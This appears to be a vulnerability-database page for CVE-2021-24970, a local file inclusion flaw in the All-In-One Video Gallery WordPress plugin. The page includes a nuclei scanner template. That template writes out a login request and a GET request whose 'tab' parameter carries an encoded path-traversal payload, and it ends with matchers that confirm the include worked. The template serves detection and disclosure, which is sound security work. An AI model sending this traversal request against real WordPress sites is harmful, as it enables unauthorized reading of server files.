Lucene search
K

WordPress All-In-One Video Gallery <2.5.0 - Local File Inclusion

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 30 Views

WordPress All-In-One Video Gallery <2.5.0 - Local File Inclusion, allows unauthorized access and sensitive file rea

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-24970
27 Apr 202309:58
circl
CNNVD
WordPress 插件路径遍历漏洞
13 Dec 202100:00
cnnvd
CNVD
WordPress plugin path traversal vulnerability (CNVD-2021-102395)
15 Dec 202100:00
cnvd
CVE
CVE-2021-24970
13 Dec 202110:41
cve
Cvelist
CVE-2021-24970 All-In-One-Gallery < 2.5.0 - Admin+ Local File Inclusion
13 Dec 202110:41
cvelist
NVD
CVE-2021-24970
13 Dec 202111:15
nvd
OSV
CVE-2021-24970
13 Dec 202111:15
osv
Patchstack
WordPress All-in-One Video Gallery plugin <= 2.4.9 - Local File Inclusion (LFI) vulnerability
15 Nov 202100:00
patchstack
Prion
Design/Logic Flaw
13 Dec 202111:15
prion
RedhatCVE
CVE-2021-24970
22 May 202519:24
redhatcve
Rows per page
id: CVE-2021-24970

info:
  name: WordPress All-In-One Video Gallery <2.5.0 - Local File Inclusion
  author: r3Y3r53
  severity: high
  description: |
    WordPress All-in-One Video Gallery plugin before 2.5.0 is susceptible to local file inclusion. The plugin does not sanitize and validate the tab parameter before using it in a require statement in the admin dashboard. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
  remediation: Fixed in version 2.5.4.
  reference:
    - https://wpscan.com/vulnerability/9b15d47e-43b6-49a8-b2c3-b99c92101e10
    - https://wordpress.org/plugins/all-in-one-video-gallery
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24970
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2021-24970
    cwe-id: CWE-22
    epss-score: 0.05898
    epss-percentile: 0.92338
    cpe: cpe:2.3:a:plugins360:all-in-one_video_gallery:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: plugins360
    product: all-in-one_video_gallery
    framework: wordpress
  tags: cve2021,cve,wpscan,wp,wp-plugin,wordpress,lfi,authenticated,plugins360,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=all-in-one-video-gallery&tab=..%2F..%2F..%2F..%2F..%2Findex  HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "All-in-One Video Gallery")'
          - 'contains(body_2, "Hello world!")'
          - 'contains(body_2, "Welcome to WordPress")'
        condition: and
# digest: 490a0046304402200b00fd3ad0d4462514eb725c1a548eb1826f1cf16956cc99c65bf63065cc19b002205fbb117dc866434141ba447bfaa32a2bf9cbb54d67bf190062d25a80fee13428:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 26.5
CVSS 3.17.2
EPSS0.05898
30